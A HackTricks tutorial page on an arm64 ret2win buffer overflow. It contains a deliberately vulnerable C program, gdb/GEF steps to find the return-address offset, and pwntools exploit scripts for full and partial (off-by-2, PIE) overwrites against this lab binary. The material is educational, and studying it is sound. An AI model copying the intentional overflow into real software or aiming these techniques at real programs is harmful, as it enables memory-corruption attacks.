mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-02 00:08:49 +00:00
216 lines
6.7 KiB
Markdown
216 lines
6.7 KiB
Markdown
# Ret2win - arm64
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
Find an introduction to arm64 in:
|
|
|
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
|
{% endcontent-ref %}
|
|
|
|
## Code 
|
|
|
|
```c
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
|
|
void win() {
|
|
printf("Congratulations!\n");
|
|
}
|
|
|
|
void vulnerable_function() {
|
|
char buffer[64];
|
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
|
}
|
|
|
|
int main() {
|
|
vulnerable_function();
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
Compile without pie and canary:
|
|
|
|
```bash
|
|
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
|
|
```
|
|
|
|
## Finding the offset
|
|
|
|
### Pattern option
|
|
|
|
This example was created using [**GEF**](https://github.com/bata24/gef):
|
|
|
|
Stat gdb with gef, create pattern and use it:
|
|
|
|
```bash
|
|
gdb -q ./ret2win
|
|
pattern create 200
|
|
run
|
|
```
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (1205).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
arm64 will try to return to the address in the register x30 (which was compromised), we can use that to find the pattern offset:
|
|
|
|
```bash
|
|
pattern search $x30
|
|
```
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (1206).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
**The offset is 72 (9x48).**
|
|
|
|
### Stack offset option
|
|
|
|
Start by getting the stack address where the pc register is stored:
|
|
|
|
```bash
|
|
gdb -q ./ret2win
|
|
b *vulnerable_function + 0xc
|
|
run
|
|
info frame
|
|
```
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (1207).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
Now set a breakpoint after the `read()` and continue until the `read()` is executed and set a pattern such as 13371337:
|
|
|
|
```
|
|
b *vulnerable_function+28
|
|
c
|
|
```
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (1208).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
Find where this pattern is stored in memory:
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (1209).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
Then: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (1210).png" alt="" width="339"><figcaption></figcaption></figure>
|
|
|
|
## No PIE
|
|
|
|
### Regular
|
|
|
|
Get the address of the **`win`** function:
|
|
|
|
```bash
|
|
objdump -d ret2win | grep win
|
|
ret2win: file format elf64-littleaarch64
|
|
00000000004006c4 <win>:
|
|
```
|
|
|
|
Exploit:
|
|
|
|
```python
|
|
from pwn import *
|
|
|
|
# Configuration
|
|
binary_name = './ret2win'
|
|
p = process(binary_name)
|
|
|
|
# Prepare the payload
|
|
offset = 72
|
|
ret2win_addr = p64(0x00000000004006c4)
|
|
payload = b'A' * offset + ret2win_addr
|
|
|
|
# Send the payload
|
|
p.send(payload)
|
|
|
|
# Check response
|
|
print(p.recvline())
|
|
p.close()
|
|
```
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (1211).png" alt="" width="375"><figcaption></figcaption></figure>
|
|
|
|
### Off-by-1
|
|
|
|
Actually this is going to by more like a off-by-2 in the stored PC in the stack. Instead of overwriting all the return address we are going to overwrite **only the last 2 bytes** with `0x06c4`.
|
|
|
|
```python
|
|
from pwn import *
|
|
|
|
# Configuration
|
|
binary_name = './ret2win'
|
|
p = process(binary_name)
|
|
|
|
# Prepare the payload
|
|
offset = 72
|
|
ret2win_addr = p16(0x06c4)
|
|
payload = b'A' * offset + ret2win_addr
|
|
|
|
# Send the payload
|
|
p.send(payload)
|
|
|
|
# Check response
|
|
print(p.recvline())
|
|
p.close()
|
|
```
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (1212).png" alt="" width="375"><figcaption></figcaption></figure>
|
|
|
|
You can find another off-by-one example in ARM64 in [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), which is a real off-by-**one** in a fictitious vulnerability.
|
|
|
|
## With PIE
|
|
|
|
{% hint style="success" %}
|
|
Compile the binary **without the `-no-pie` argument**
|
|
{% endhint %}
|
|
|
|
### Off-by-2
|
|
|
|
Without a leak we don't know the exact address of the winning function but we can know the offset of the function from the binary and knowing that the return address we are overwriting is already pointing to a close address, it's possible to leak the offset to the win function (**0x7d4**) in this case and just use that offset:
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (1213).png" alt="" width="563"><figcaption></figcaption></figure>
|
|
|
|
```python
|
|
from pwn import *
|
|
|
|
# Configuration
|
|
binary_name = './ret2win'
|
|
p = process(binary_name)
|
|
|
|
# Prepare the payload
|
|
offset = 72
|
|
ret2win_addr = p16(0x07d4)
|
|
payload = b'A' * offset + ret2win_addr
|
|
|
|
# Send the payload
|
|
p.send(payload)
|
|
|
|
# Check response
|
|
print(p.recvline())
|
|
p.close()
|
|
```
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|